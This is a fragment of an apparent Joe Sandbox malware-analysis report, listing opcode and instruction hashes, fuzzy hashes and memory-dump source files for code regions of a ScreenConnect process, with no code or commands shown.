                                                                • Opcode Fuzzy Hash: 953ca7974f15fcf6eed61a7ad6d7079687652f781200af4dfa282df3fde733fe
                                                                • Instruction Fuzzy Hash: 5441D535B042198BFB28AB75E4587FEBBB6EB88310F148529D402E73C4DFB09C058B95
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2eb8aac3c973f1bf516f70c692a32e36ee6b6f8706aa687ee01743a3ba51fc8d
                                                                • Instruction ID: 83f1f391306190dd6af320b8d0b4b7de4430582432388f9b2832d693f41a80e5
                                                                • Opcode Fuzzy Hash: 2eb8aac3c973f1bf516f70c692a32e36ee6b6f8706aa687ee01743a3ba51fc8d
                                                                • Instruction Fuzzy Hash: 45513E74B002168BEB05DF69D890AAEF7F2FF89300B148669D515AB354EB70EC16CB90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0ed880f70ac7d8281edbfff92b30dfa1dea5fd85a010c60b5d1c28545eba4f18
                                                                • Instruction ID: 6316672e1f3829f50e8ab6f49d29f76a4748bfbb75d23fbe68e978a1d22df66a
                                                                • Opcode Fuzzy Hash: 0ed880f70ac7d8281edbfff92b30dfa1dea5fd85a010c60b5d1c28545eba4f18
                                                                • Instruction Fuzzy Hash: 3C41C630610706CFCB34DF29D858666B7F5FF99314B184A6CE596DB6A4EB30E806CB84
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 042576148308486ff5700ece46c5d39a682dc895864c6eeb216f7d2663a9981c
                                                                • Instruction ID: 8f2c318b84a957bda951efe3978fd741ee3c8568af48cc9c030a43b316ce4a8c
                                                                • Opcode Fuzzy Hash: 042576148308486ff5700ece46c5d39a682dc895864c6eeb216f7d2663a9981c
                                                                • Instruction Fuzzy Hash: A0412535E0434A8FEB15DBB4C8507EEBBB2FF8A200F148269D411BB641DB756C05C7A1
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9bfa4e4a40bf6e595322fa40227df2f9105f7e0f05f052c10a1045c080272785
                                                                • Instruction ID: 107d4212d73ba92b6832a687d12bf6ec5c2748954225828ac647d266a8434533
                                                                • Opcode Fuzzy Hash: 9bfa4e4a40bf6e595322fa40227df2f9105f7e0f05f052c10a1045c080272785
                                                                • Instruction Fuzzy Hash: 4D413D71E1021A9BDB14DFA6C890BEEBBB6FF88700F148129E511BB354DB70AD45CB90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 00a719eb76c19904c028478dc088fb3012753311bb05a6d28ac6fb26c338e3cb
                                                                • Instruction ID: 3c58317d947da8f0c826d0ea43c9fe65a85e3b73ccf1e1ce0157d647a2eb380d
                                                                • Opcode Fuzzy Hash: 00a719eb76c19904c028478dc088fb3012753311bb05a6d28ac6fb26c338e3cb
                                                                • Instruction Fuzzy Hash: 6B413E70A00745CFC720DF29D484A6ABBF2FF89354B188658D596CB3A5D731E806CB90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 33ad0a87d22c53caadb7bf349798f7a8d45ccf9ccfc6fbfcbb305f4949277e88
                                                                • Instruction ID: e0b8a3d477e7f15243dc9db03b6123f5203d9d6d75064063344274a887ed715a
                                                                • Opcode Fuzzy Hash: 33ad0a87d22c53caadb7bf349798f7a8d45ccf9ccfc6fbfcbb305f4949277e88
                                                                • Instruction Fuzzy Hash: 1E417934700605DFDB10CF58C894DAABBF2FF89310B19C9A9E5599B221D731F951CB80
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e3d33bf6b4ae5cdccd98f9d8067ccaa1252b13647d1fa4fa8961efe62114aecb
                                                                • Instruction ID: d47b367819649fd430f1f0a56033b649059b644ce1f003ba79b1711387cfdf59
                                                                • Opcode Fuzzy Hash: e3d33bf6b4ae5cdccd98f9d8067ccaa1252b13647d1fa4fa8961efe62114aecb
                                                                • Instruction Fuzzy Hash: 3B414331604B019BD738CE69D890A9BB7F6AF84320B108B2DE566C76D0DB71F8068B91
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2307b156066c7a8badab07feb99979c62d65743b762eb1182fa04875b7d10709
                                                                • Instruction ID: d4d99785882bb40a82b9d22afd2b22779be017f401282b912bcc0c7e1ecc72c0
                                                                • Opcode Fuzzy Hash: 2307b156066c7a8badab07feb99979c62d65743b762eb1182fa04875b7d10709
                                                                • Instruction Fuzzy Hash: E3411574A00215CFD718DB68C998B99B7F2FF89310F1481A9E54AEB361DB71AD81CF50
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fe77cab1d907c73fb3907d1c92847fd8efe82cb8a5a8b8d23ad686b645fd5387
                                                                • Instruction ID: aacef5e00b09f26c23db460d447fa63d19a636db95c42bb4354c8f0d7863ad14
                                                                • Opcode Fuzzy Hash: fe77cab1d907c73fb3907d1c92847fd8efe82cb8a5a8b8d23ad686b645fd5387
                                                                • Instruction Fuzzy Hash: 85316F34B1021A8FCB14EBADD4509AEF7F6EF89250B14866AD909D7358EB30EC058BD0
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 264b68798e2def5a3dfcf6008cd2b2a6290b6a8d0be7af5014b52f4807b8541b
                                                                • Instruction ID: 96d339aba8c47e92eea39214132bd1a00458427dcd41efc36b384f2540ebdf8a
                                                                • Opcode Fuzzy Hash: 264b68798e2def5a3dfcf6008cd2b2a6290b6a8d0be7af5014b52f4807b8541b
                                                                • Instruction Fuzzy Hash: 27416331A103099BEF18DFB1CC54BEE7BB6BF88304F108529E505AB295EFB59945CB90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3c3697e82479f238c1bd74e884e6fbdefa6de8881a80c0c99f20e7829c651cc7
                                                                • Instruction ID: 621172945dda522fe7cbbd2859e5ef9b6f05fcc1db7b511b60ab6a14d9a37938
                                                                • Opcode Fuzzy Hash: 3c3697e82479f238c1bd74e884e6fbdefa6de8881a80c0c99f20e7829c651cc7
                                                                • Instruction Fuzzy Hash: 8A314531E103099BEF18DFA1C8547EE7BB6AF88304F108529E505AB295EFB59945CB90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fa90ae145d50e277858796ceaa27c2fa27cfe2c73a16a8ab06ad932a61c50704
                                                                • Instruction ID: c577275afb2759c34bbf751dd671e9562d7728adb87222435a0e54f3b1587222
                                                                • Opcode Fuzzy Hash: fa90ae145d50e277858796ceaa27c2fa27cfe2c73a16a8ab06ad932a61c50704
                                                                • Instruction Fuzzy Hash: 8F41E830A01215DFEF28DF68D998AEC77B3FB45315F1046A9E5159B2A2DBB99D80CB00
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: db2c38075d09c08768d626dab8c707a15e1ccf691502e3285971ea1d836e7927
                                                                • Instruction ID: 1badb8b81d802645c2e71591c31fe161c322f02cd17a33732ed431cbb9c20e2a
                                                                • Opcode Fuzzy Hash: db2c38075d09c08768d626dab8c707a15e1ccf691502e3285971ea1d836e7927
                                                                • Instruction Fuzzy Hash: A1318F31A04259CFDB15DB68C8A4AEDBBF1FF4A310F15409AD541AB362DB349C45CBA1
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6f5790497b332eda66f7826f05e1f4e6af3b96ed98957fdd5153e1c81a63406d
                                                                • Instruction ID: 014a02a47bbe74ba56fbf2434c86a9cefb390d30228170804b9502eea7a9aab1
                                                                • Opcode Fuzzy Hash: 6f5790497b332eda66f7826f05e1f4e6af3b96ed98957fdd5153e1c81a63406d
                                                                • Instruction Fuzzy Hash: DF310738700606CFCB14DF69E994D6ABBF2FF8931071485A8E51A8B361EB30EC05CB90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8f6fe800a7d516fbeb3216cc3a75618ab8d594d3de28a0128a47028cc4d43108
                                                                • Instruction ID: fe8daa48cf259a88be78befd597a9d9f4eedefe8199ab8b6c7fd191bd03ebed9
                                                                • Opcode Fuzzy Hash: 8f6fe800a7d516fbeb3216cc3a75618ab8d594d3de28a0128a47028cc4d43108
                                                                • Instruction Fuzzy Hash: B441F5397006068FCB14DF69E994D6ABBF2FF8931171885A9E55ACB361EB30EC04CB40
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 89c5cd091afce4044a2e05878d935fabc299b1c14427798a1867e09abb329f40
                                                                • Instruction ID: 317970f10cbd48bed8e954a6e17a60f588d96301f0f89bf340d96abc7abe7315
                                                                • Opcode Fuzzy Hash: 89c5cd091afce4044a2e05878d935fabc299b1c14427798a1867e09abb329f40
                                                                • Instruction Fuzzy Hash: B3317074600205CFDF18CF28E8D4A9A7BB6FF89320B144294D9529F3E9D771E851CBA1
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: eb177479056307f9ca6a202d3727c0093068ca7092e3cda6bc3f6d880e0a090a
                                                                • Instruction ID: 90ec08d697d0525de3e34c9135b281ccf9f0d6a930a2f8bc753745001b81660c
                                                                • Opcode Fuzzy Hash: eb177479056307f9ca6a202d3727c0093068ca7092e3cda6bc3f6d880e0a090a
                                                                • Instruction Fuzzy Hash: A7410574A00219CFEB14DFA8D594AADBBF2AF48304F148559E411EB361CBB4EC44CF61
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 917f9af1e7c5cdfc7ce3031fed31000d64f8e3cbad02dd0c11031a89ae216ca0
                                                                • Instruction ID: 5a8548f25709faf6e0506841293050e4efb6ffe6e49e5184017f87d00b49016b
                                                                • Opcode Fuzzy Hash: 917f9af1e7c5cdfc7ce3031fed31000d64f8e3cbad02dd0c11031a89ae216ca0
                                                                • Instruction Fuzzy Hash: B221257680024ADFCF10CF9AC844ADEBBF5FB88310F148429E914A7210C379A555DFA1
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 84d3b0eccc97785fb9fa05327e85ca8855d8aea8494acf11a2324b8898f37f9b
                                                                • Instruction ID: 50808cc3c98579344db4310f89b5f3d3410935213ae4c0c75c8307bea9c67871
                                                                • Opcode Fuzzy Hash: 84d3b0eccc97785fb9fa05327e85ca8855d8aea8494acf11a2324b8898f37f9b
                                                                • Instruction Fuzzy Hash: B6116371A046599FDB15DF6AC8448BAFBF5FF893247108665E039D76A0E7309D01CB50
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d68d4d0cbd6dbbfb18665a849ded7b92804ec1b22fb62c9b911f4b83cb8b736b
                                                                • Instruction ID: b67e7393c3652ea71ac7918aa387c5ed6281f8c16244aa723c09656bca43e18b
                                                                • Opcode Fuzzy Hash: d68d4d0cbd6dbbfb18665a849ded7b92804ec1b22fb62c9b911f4b83cb8b736b
                                                                • Instruction Fuzzy Hash: 02215832D10B0B8DCB11EFB9D8505EAFBB4EF99300F00C62AD558A7111FB70A2958B91
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 645513e7f2fb37a59d11c205a46482d24e688278d37fa61ed8c2cee97b6b250a
                                                                • Instruction ID: 5b9d24ece1c90ba7640f7db5108c86a3e1331b72018899b74eae4c2ac1209034
                                                                • Opcode Fuzzy Hash: 645513e7f2fb37a59d11c205a46482d24e688278d37fa61ed8c2cee97b6b250a
                                                                • Instruction Fuzzy Hash: AC214831F1120A9BDB28EB61D4587AEBBFABF8C710F149468D402B7294EF715C41DB54
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 997b8d6abfe25e2618ac3d4545d1f39568b6abdb712c2ae2c170547c74227a8c
                                                                • Instruction ID: 4a4d4ddcbf9b6187b966adc929807a038f7c30ba9222b701ed49ffb6b020c792
                                                                • Opcode Fuzzy Hash: 997b8d6abfe25e2618ac3d4545d1f39568b6abdb712c2ae2c170547c74227a8c
                                                                • Instruction Fuzzy Hash: 3A2115B1C002599FDB10CFAAD884BEEFBF4EB48310F15842AE554A7241D379A945CFA5
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3f7b2851c58d3d3f7473f62150027b635750556104d25a2dae8520c28230678e
                                                                • Instruction ID: 5320fc259889c0995ad805ab6daa00d46ff9b3df4dd07576d95001fb7b98bf85
                                                                • Opcode Fuzzy Hash: 3f7b2851c58d3d3f7473f62150027b635750556104d25a2dae8520c28230678e
                                                                • Instruction Fuzzy Hash: 51116D353406208FD715DB28D994B6A77A2FFC4711F0548ADE5068B360CB75EC16CB80
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: beb15dfd3e563511dcbe8044954fdb05eea8ab53890441cb0916e789f5d83f37
                                                                • Instruction ID: 32fbc6257be3c3d1ea7d88cf48172453b3e2c6cd2924ef476f5f4cb24e53f9d6
                                                                • Opcode Fuzzy Hash: beb15dfd3e563511dcbe8044954fdb05eea8ab53890441cb0916e789f5d83f37
                                                                • Instruction Fuzzy Hash: 81115131B1020ADFCB14DB69D9919EFBBB5FF85310B408569E6199B314EB70E905CBD0
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5667f53b9fea0796f16f0187634d6716d1e470c5d19cbdcc44ad67643da561e8
                                                                • Instruction ID: 282d2fcedcd595e94883a0521b428eb0bcf6f77143426c72ebb4fea9d435b7b1
                                                                • Opcode Fuzzy Hash: 5667f53b9fea0796f16f0187634d6716d1e470c5d19cbdcc44ad67643da561e8
                                                                • Instruction Fuzzy Hash: 28114934A002189FDB04DF68C9A5AADBBF2EF89310F158559D545EB3A1CB75AD02CB90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8a33bb493e8fcf00665ebb5a144e48ca140a810002e9bbb1a0040357449abecf
                                                                • Instruction ID: 02c149c63de549e486d7879c9c69a2462df68ce53dac396489866ae5238d2614
                                                                • Opcode Fuzzy Hash: 8a33bb493e8fcf00665ebb5a144e48ca140a810002e9bbb1a0040357449abecf
                                                                • Instruction Fuzzy Hash: DF1186357141118FCB14E77D985096AB7F6EFC6640B1856AED905CB355EB30EC0583D1
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c8e98b6a5f0465fc86a021a35ea000a57dfd956717b56045d0926016b6f34f45
                                                                • Instruction ID: 60cced6e8247200bfb2a9f4ec15f2c023fb9b364b7305689035f73c397bc9b7a
                                                                • Opcode Fuzzy Hash: c8e98b6a5f0465fc86a021a35ea000a57dfd956717b56045d0926016b6f34f45
                                                                • Instruction Fuzzy Hash: CC018C367401218FC708DA6EF89496AB7AAFBC932131985BAE50AC7320CE32DC138754
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6e6b235f3bbc09a8a46f560b29ec837dbb2c6f48ac7cdf6ec0cddd45006e537b
                                                                • Instruction ID: 83e0fa6292570f2d95536c562b90e9602375e99adb5037601eb565d60135f686
                                                                • Opcode Fuzzy Hash: 6e6b235f3bbc09a8a46f560b29ec837dbb2c6f48ac7cdf6ec0cddd45006e537b
                                                                • Instruction Fuzzy Hash: E9118A32204109AF9705DF69EC909AFBBBAFF85210714852EE515D7210EB33E9168BD0
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8e53381f1aa00a61b6d5d18f0143feca0154766de7314cbf6c6756ee09e7dae8
                                                                • Instruction ID: 8552538b13b763615bb34b455d0b77d663cfe49d26a96b5f8a78851852493fc4
                                                                • Opcode Fuzzy Hash: 8e53381f1aa00a61b6d5d18f0143feca0154766de7314cbf6c6756ee09e7dae8
                                                                • Instruction Fuzzy Hash: 02116A353407208FDB19DB28D9A4A6A77E2FFC9711B4148ADE5068B3A0DF75EC16CB80
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d404687b0dd35134a6a59d3dc909db602e34de40c2b65760cab0677fb9eb898f
                                                                • Instruction ID: d1f2c41ad6653625aaec1938b1a1185abc35fbd7ef4c15c1304525f541eb326e
                                                                • Opcode Fuzzy Hash: d404687b0dd35134a6a59d3dc909db602e34de40c2b65760cab0677fb9eb898f
                                                                • Instruction Fuzzy Hash: 232106B1C042599FDB10CFAAD844BEEFBF8EB48320F15842AE554A7241C379A545CFA5
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3392100124.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_124d000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                                • Instruction ID: 7ff89e2ad25346a5577fc6218e5f51a6efd16cdc3bfb2d25576aae07737bc1b3
                                                                • Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                                • Instruction Fuzzy Hash: 3E11D676504284DFCB1ACF54D5C4B16BF71FB94314F24C5A9D9090B257C336D456CB91
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5469f858fd67e3604352f37a14d34e033524049a6fa8ad0f6379f215caa3f809
                                                                • Instruction ID: e0da7f540582a463790fdd4d89c0245cc1eea247618492ea1f451a20f0897f66
                                                                • Opcode Fuzzy Hash: 5469f858fd67e3604352f37a14d34e033524049a6fa8ad0f6379f215caa3f809
                                                                • Instruction Fuzzy Hash: C7117C316093808FE716DB38DC64559BFB2EE4725030A89EBD545CF2B7DA35980AC7A2
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bc5b3f04c0c7d60820b6c779e58ac2f1f9eb93bc9b584d9017d8ca736c45cdbf
                                                                • Instruction ID: 8d4311785b3ded23ee19d51c33363cb00fe212bf01582a061d5e41bd701b71ca
                                                                • Opcode Fuzzy Hash: bc5b3f04c0c7d60820b6c779e58ac2f1f9eb93bc9b584d9017d8ca736c45cdbf
                                                                • Instruction Fuzzy Hash: 53211D74F1021ADFFF04EBA8E8589AEBBB6FB98300B104569D905A7360DF30AD058B51
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9b14543f291b0481519fb9c10f6a6287341bb2ee34d39187d422bb7f103e4b48
                                                                • Instruction ID: 9797183e4f9c2d515524757f2e1182f2cc69a3f2bc11d26b5dff989e51278c56
                                                                • Opcode Fuzzy Hash: 9b14543f291b0481519fb9c10f6a6287341bb2ee34d39187d422bb7f103e4b48
                                                                • Instruction Fuzzy Hash: 810188723042059F9705DB69EC919AEBBB6FFC5220750C53EE519DB200EF32E90687A0
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9d62bdb37f626d7f7c624607cea0a04cd01ac423810572b4f7ffa16f3fc30a94
                                                                • Instruction ID: 7e4aad6dfc7e2af1092bb9ad5344b6fd41a3bcfafd3c80d44b8814cf051aec03
                                                                • Opcode Fuzzy Hash: 9d62bdb37f626d7f7c624607cea0a04cd01ac423810572b4f7ffa16f3fc30a94
